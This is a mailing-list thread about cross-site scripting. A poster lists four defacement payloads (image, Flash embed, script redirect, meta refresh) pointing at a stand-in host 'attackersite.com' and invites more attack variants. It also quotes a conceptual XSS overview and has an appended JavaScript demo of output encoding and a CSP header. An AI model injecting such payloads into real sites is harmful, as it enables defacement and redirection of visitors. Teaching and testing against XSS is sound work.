Hi,

Further level of XSS........

Q. What can be done with XSS?
Q. How severe can the effect of XSS be?

The inputs below give us clarity on what XSS is actually worth!!!!!

Check out the principal methods of defacing using XSS:

Defacement using Image:
<IMG SRC="http://attackersite.com/malicious.png">

Defacement using a Flash Video:
<EMBED SRC="http://attackersite.com/malicious.swf">

Defacement using Redirection to attacker's Page:
<script>window.open("http://www.attackersite.com/malicious.html")</script>

Also:
<meta http-equiv="refresh" content="0; url=http://attackersite.com/malicious.html" />

Now, after going through the above inputs we can understand how severe
its effect can be.
As a conclusion, XSS can compromise your system and it can also turn out to be
a zombie.

***Please quote your inputs to have more elaborated and different ways
to hit XSS.

Regards,
0xN41K
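
Added example (not part of the original message): the four payloads listed above only take effect when an application writes user input into the page unencoded. The JavaScript below, using illustrative function names and a constructed comment template, renders each payload unencoded and HTML-encoded, and shows a CSP header as a second layer.

```javascript
// Encode the characters that let text break out of an HTML text node or a
// quoted attribute value. '&' is replaced first so entities are not double-broken.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable pattern: user input concatenated straight into markup.
function renderCommentUnsafe(comment) {
  return '<p class="comment">' + comment + "</p>";
}

// Hardened pattern: the same template, with the input encoded on output.
function renderComment(comment) {
  return '<p class="comment">' + escapeHtml(comment) + "</p>";
}

// Second layer: blocks inline scripts, off-site images and plugin content.
// CSP does not govern <meta http-equiv="refresh">, so encoding stays the primary control.
const CSP_HEADER =
  "Content-Security-Policy: default-src 'self'; script-src 'self'; " +
  "img-src 'self'; object-src 'none'; base-uri 'none'";

// True when the rendered HTML contains a live tag of the kinds used in the message.
function containsInjectedTag(html) {
  return /<\s*(img|embed|script|meta)\b/i.test(html);
}

// The four inputs from the message, used here as test data.
const payloads = [
  '<IMG SRC="http://attackersite.com/malicious.png">',
  '<EMBED SRC="http://attackersite.com/malicious.swf">',
  '<script>window.open("http://www.attackersite.com/malicious.html")</script>',
  '<meta http-equiv="refresh" content="0; url=http://attackersite.com/malicious.html" />',
];

// For each payload, report whether a live tag survives in each rendering.
function audit() {
  return payloads.map((p) => ({
    unsafe: containsInjectedTag(renderCommentUnsafe(p)),
    safe: containsInjectedTag(renderComment(p)),
  }));
}

console.log(audit());
console.log(CSP_HEADER);
```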


On May 12, 7:38 am, N41K <[email protected]> wrote:
> Hi,
>
>      From today onwards we are going to have Chapters for Application
> Security. Hope everyone will put in their expertise and make this
> Chapter fully informative.
>
> Let's go ahead with XSS (Cross Site Scripting)
>
> Cross Site Scripting is a browser exploit taking advantage of a
> vulnerability within a zone-based security solution.
> The attack allows content (scripts) in unprivileged zones to be
> executed with the permissions of a privileged zone - i.e.
> a privilege escalation within the client (web browser) executing the
> script.
>
> The attack can occur on:
>
>     * a web browser (HTTP Client) vulnerability which under some
> conditions allows content (scripts)
>       to be executed with the permissions of a higher privileged
> zone (Administrator).
>
>     * a web browser configuration error; unsafe sites listed in
> privileged zones.
>
>     * a cross-site scripting vulnerability (from Web Application)
> within a privileged zone
>
> The common attack scenario involves two steps:
>     i. Use the XSS vulnerability to execute scripts within a
> privileged zone. The script may be any JS (JavaScript) which
> performs some malicious action.
>     ii. Hit the vulnerability using ActiveX components (PC gets
> compromised).
>
> Such vulnerabilities have been exploited and have silently installed various
> malware (such as remote control software, worms, viruses, Trojans,
> keyloggers, etc.)
>
> All such things happen when a user browses a malicious web page.
>
> Finally, Use a Safer Web Browser and Surf a Safer Web Site.
>
> *** If anyone would like to add points for this topic, all are
> welcome.
>
> Regards,
> 0xN41K
>
> --
> You received this message because you are subscribed to the Google Groups 
> "nforceit" group.
> To post to this group, send an email to [email protected].
> To unsubscribe from this group, send email to 
> [email protected].
> For more options, visit this group
> at http://groups.google.com/group/nforceit?hl=en-GB.
